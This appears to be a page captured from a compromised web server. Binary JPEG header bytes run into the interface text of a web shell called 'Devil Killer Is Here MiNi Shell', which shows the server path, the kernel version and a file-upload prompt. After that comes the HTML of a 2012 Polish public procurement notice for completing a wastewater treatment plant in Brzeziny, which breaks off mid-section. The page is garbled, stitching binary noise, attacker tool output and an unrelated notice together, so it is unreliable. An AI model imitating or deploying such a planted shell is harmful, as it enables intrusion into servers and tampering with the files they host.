JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121023/411838-N-2012.html

<p class="kh_header"><b>Brzeziny: Rozbudowa i modernizacja oczyszczalni ścieków w Brzezinach przy ul. Waryńskiego 50 wraz z budową kanalizacji sanitarnej w ul. Kościuszki w Brzezinach - dokończenie robót</b><br>
<b>Numer ogłoszenia: 411838 - 2012; data zamieszczenia: 23.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych sp. z o. o. , ul. Przemysłowa 14, 95-060 Brzeziny, woj. łódzkie, tel. 046 8742752, faks 046 8742528.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modernizacja oczyszczalni ścieków w Brzezinach przy ul. Waryńskiego 50 wraz z budową kanalizacji sanitarnej w ul. Kościuszki w Brzezinach - dokończenie robót.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Rozbudowa i modernizacja oczyszczalni ścieków w Brzezinach realizowana w zakresie ciągu ściekowego i osadowego - dokończenie robót.
Rozbudowa i modernizacja Oczyszczalni ścieków w okresie od maja 2010 do lutego 2012 realizowana była przez  Wykonawcę, z którym w kwietniu 2012 r. umowa została rozwiązana.
Zakres robót objętych zamówieniem obejmuje wykonanie robót budowlano-montażowych związanych z dokończeniem rozbudowy i modernizacji oczyszczalni ścieków, w tym m.in.:
Dokończenie robót budowlano-montażowych wg dokumentacji projektowej dla następujących obiektów:
Budynek Oczyszczania Mechanicznego ob. Nr 01
Punkt Zlewny Ścieków Dowożonych ob. Nr 02 
Blok Oczyszczania Biologicznego ob. Nr 05; Uwaga: do modernizacji ciągu nr 5.2 można przystąpić po rozruchu ciągu nr 5.1
Komora Rozdzielcza ob. Nr 06, 
Osadnik Wtórny Modernizowany ob. Nr 7.1
Budynek Techniczny ob. Nr 15
Kanały i Rurociągi technologiczne ob. Nr 20 
Przyłącze wody 
Instalacje elektryczne i AKPiA - dokończenie robót wg dokumentacji projektowej, w tym wykonanie badań i pomiarów wszystkich linii kablowych. Zakres prac obejmuje wykonanie oprogramowania aplikacyjnego do wszystkich sterowników PLC i paneli operatorskich zabudowanych na terenie oczyszczalni (zarówno przez poprzedniego Wykonawcę jak i nowych do wykonania oraz do systemu SCADA). Aktualnie zainstalowane oprogramowanie musi zostać usunięte z pamięci sterowników PLC, paneli operatorskich oraz stacji dyspozytorskiej i zastąpione nowym oprogramowaniem.
	Zbiorniki Uśredniania Osadu ob. Nr 11. 1 i 11.2
	Budynek Gospodarki Osadowej ob. Nr 12 
	Fundament pod silos wapna (remont) 
	Wiata Osadu Odwodnionego ob. Nr 13 
	Drogi, place zagospodarowanie terenu,
	Sprzęt BHP, ppoż i wyposażenie laboratorium (dostawa wyposażenia wg dokumentacji projektowej),
	Demontaże istniejących urządzeń i instalacji tymczasowych, w tym: tymczasowe stanowisko starego sito piaskownika, tymczasowe sieci i instalacje, likwidacja studni głębinowych.
	Pierwsze uruchomienia urządzeń z udziałem serwisu Dostawcy w obiektach:
	Budynek Oczyszczania Mechanicznego - ob. Nr 01 
	Blok Oczyszczania Biologicznego ob. Nr 05 
	Osadnik Wtórny Modernizowany ob. Nr 7.1
	Rozruch kompleksowy wszystkich obiektów oczyszczalni 
Zamawiający planuje dalsze prowadzenie robót w dwóch Fazach, w celu umożliwienia płynnego przebiegu prac modernizacyjnych obiektów oczyszczalni i zarazem skutecznego bieżącego oczyszczania ścieków.  
Zadaniem I Fazy jest uruchomienie obiektów nowych i zmodernizowanych w celu umożliwiania  dalszych prac  modernizacyjnych na bloku oczyszczania biologicznego i utrzymania ciągłości  oczyszczania wpływających ścieków.
W tym celu konieczny jest następujący zakres robót:
1.	Dokończenie i uruchomienie budynku oczyszczania mechanicznego - ob. Nr 01
2.	Dokończenie i uruchomienie punktu zlewnego ścieków dowożonych - ob. Nr 02
3.	Uruchomienie pompowni  ścieków podczyszczonych mechanicznie - ob. Nr 04
4.	Dokończenie i uruchomienie I ciągu bloku oczyszczania biologicznego - ob. Nr   
         5.1
5.	Uruchomienie stacji dmuchaw - ob. Nr 17
6.	Rurociągi technologiczne 20.1.1 ; 20.1.3 ; 20.5.1. i inne rurociągi i instalacje powiązane z wymienionymi obiektami niezbędne do ich działania
7.	Instalacje elektroenergetyczne, AKPiA powiązane z wymienionymi obiektami  niezbędne do  ich działania
8.	Wykonanie wszystkich robót tymczasowych niezbędnych do uruchomienia wymienionych obiektów 

Ukończenie Robót Fazy I winno być potwierdzone protokółem odbioru Robót Fazy I, po przeprowadzeniu pierwszego uruchomienia urządzeń, koniecznych prób i badań oraz 48 h bezawaryjnej pracy obiektów na płynących ściekach. 
Zadaniem II Fazy jest wykonanie wszystkich pozostałych prac objętych zakresem zamówienia.  
Kontrakt będzie realizowany zgodnie z Warunkami Kontraktowymi dla Budowy dla robót inżynieryjno-budowlanych projektowanych przez Zamawiającego FIDIC - 4.wydanie angielsko-polskie niezmienione 2008 tłumaczenie 1. wydania 1999 SIDIR. Wersja wiążąca - tłumaczenie polskie.
Szczegółowy opis i zakres przedmiotu zamówienia przedstawiony został w Części III SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, zgodnie z art. 67 ust. 1 pkt 6 ustawy w wysokości do 40% wartości niniejszego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium. Każdy Wykonawca zobowiązany jest wnieść przed upływem  terminu składania ofert wadium w wysokości: 150.000,00 PLN
Wadium może być wniesione  w następujących formach: a) Pieniądzu, b) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c) Gwarancjach bankowych, d) Gwarancjach ubezpieczeniowych, e) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007r. Nr 42, poz. 275 z późn. zm.)  
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy.
Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
Utrata wadium:
a) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
b) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
i.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
ii.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
iii.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca obowiązany jest do posiadania odpowiedniej wiedzy i doświadczenia, tj.:
(i) wykonania (zakończenia) w okresie ostatnich pięciu lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej dwóch zamówień na roboty budowlane polegających na budowie lub przebudowie oczyszczalni ścieków o wartości robót nie mniejszej niż 7 mln PLN netto każde</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca obowiązany jest do dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.:
Ekspert 1 -  Kierownik Kontraktu - co najmniej 4 lata doświadczenia w zarządzaniu kontraktami na roboty budowlane w oparciu o Warunki Kontraktowe FIDIC lub równoważne, na stanowisku kierownika kontraktu, przedstawiciela lub kierownika zespołu wykonawcy lub kierownika zespołu zamawiającego, w tym co najmniej 24 miesiące doświadczenia na co najmniej jednym z ww. stanowisk przy realizacji co najmniej jednego kontraktu lub projektu, o łącznej wartości robót co najmniej 7 mln PLN netto;
Ekspert 2 - Kierownik budowy - minimum 5 lat doświadczenia zawodowego w nadzorowaniu robót budowlanych (po uzyskaniu uprawnień). Doświadczenie kierownika budowy musi obejmować pełnienie tej funkcji w okresie ostatnich 10 lat przez co najmniej 1 rok na kontrakcie obejmującym budowę lub przebudowę oczyszczalni ścieków o wartości robót co najmniej 7 mln PLN netto; posiadać uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń do kierowania robotami wydane na podstawie obecnie obowiązujących przepisów lub uprawnienia w specjalności konstrukcyjno-budowlanej wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zamówienia, albo posiada uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi bez ograniczeń wydane na podstawie obowiązujących przepisów lub uprawnienia w zakresie sieci wodociągowych i kanalizacyjnych wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zamówienia; 
Ekspert 3 - Kierownik robót sanitarnych - minimum 5 lat doświadczenia zawodowego w nadzorowaniu robót budowlanych na terenie oczyszczalni ścieków (po uzyskaniu uprawnień); posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi bez ograniczeń wydane na podstawie obecnie obowiązujących przepisów lub uprawnienia w zakresie sieci wodociągowych i kanalizacyjnych wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zamówienia;
Ekspert 4 - Kierownik robót elektrycznych i AKPiA - minimum 5 lat doświadczenia zawodowego w nadzorowaniu robót budowlanych (po uzyskaniu uprawnień); posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami budowlanymi bez ograniczeń wydane na podstawie obecnie obowiązujących przepisów lub uprawnienia w zakresie instalacji i urządzeń elektrycznych wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej, Wykonawca obowiązany jest do spełnienia niżej wymienionych warunków, tj.:
a)	osiągnięcia w każdym z ostatnich 3 lat obrotowych (2009, 2010, 2011), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roczne przychody netto (bez VAT) ze sprzedaży wynoszące minimum równowartość 7 mln PLN;
b)	posiadania środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż równowartość kwoty 1,5 mln PLN .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia Kontraktu w sprawie niniejszego zamówienia.
1. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
2. Zamawiający wymaga, aby Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą zawarli umowę regulującą współpracę tych Wykonawców i przedłożyli tę umowę Zamawiającemu wraz z zabezpieczeniem należytego wykonania Kontraktu. 
3. W przypadku, gdy Wykonawcę/ów reprezentuje Pełnomocnik, pełnomocnictwo powinno być dołączone do oferty w oryginale. W przypadku złożenia kopii pełnomocnictwa dokument musi być poświadczony notarialnie.
Ponadto:
Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt. 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca zobowiązany jest złożyć odpowiednie dokumenty, o których mowa w § 2 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2009 r., poz. 266, poz. 1817).
W przypadku składania oferty przez podmioty występujące wspólnie, należy do oferty dołączyć: dokumenty wymienione w pkt. III.4.1) przez przynajmniej jeden z podmiotów występujących wspólnie (każdy dokument może dotyczyć innego podmiotu występującego wspólnie).
W przypadku składania oferty przez podmioty występujące wspólnie, należy do oferty dołączyć: dokumenty wymienione w pkt. III.4.2) przez każdy z podmiotów występujących wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
